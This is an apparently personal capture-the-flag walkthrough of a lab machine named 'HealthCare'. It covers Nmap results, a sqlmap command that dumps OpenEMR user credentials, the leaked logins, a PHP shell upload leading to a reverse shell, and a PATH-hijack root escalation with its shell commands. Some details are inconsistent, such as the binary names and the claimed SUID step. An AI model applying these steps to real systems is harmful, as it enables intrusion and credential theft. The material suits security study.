HealthCare

Nmap

21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries 
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ 
|_/all_our_e-mail_addresses /admin/ /
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
|_http-title: Coming Soon 2
MAC Address: 08:00:27:12:B9:5A (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Enumeration

Gobuster

found openemr // lead to sql injection at login page

Exploitation

sqlmap -u http://10.0.2.37/openemr/interface/login/validateUser.php?u=admin -D openemr -T users --dump

from sql creds , logged into ftp

medical : medical 
ackbar : admin 

uploaded php shell into var/www/ folder

got reverseShell

Privilage Esclation

from suid , healthChecker is executing the fdisk , ipconfig without path

can override the ifconfig , path

The program is vulnerable because we control the PATH and the program doesn’t use the absolute path to execute the programs so we can execute anything we want as root. To get root I’ll just create a script that sets the SUID bit on /bin/bash, name it ifconfig and call /usr/bin/healthcheck after setting the path to my current directory so it doesn’t execute the real fdisk program but my own script

cd /tmp 

echo "/bin/bash" > ifconfig

chmod +x ifconfig

export PATH=/tmp:$PATH

/usr/bin/healthcheck

//got root access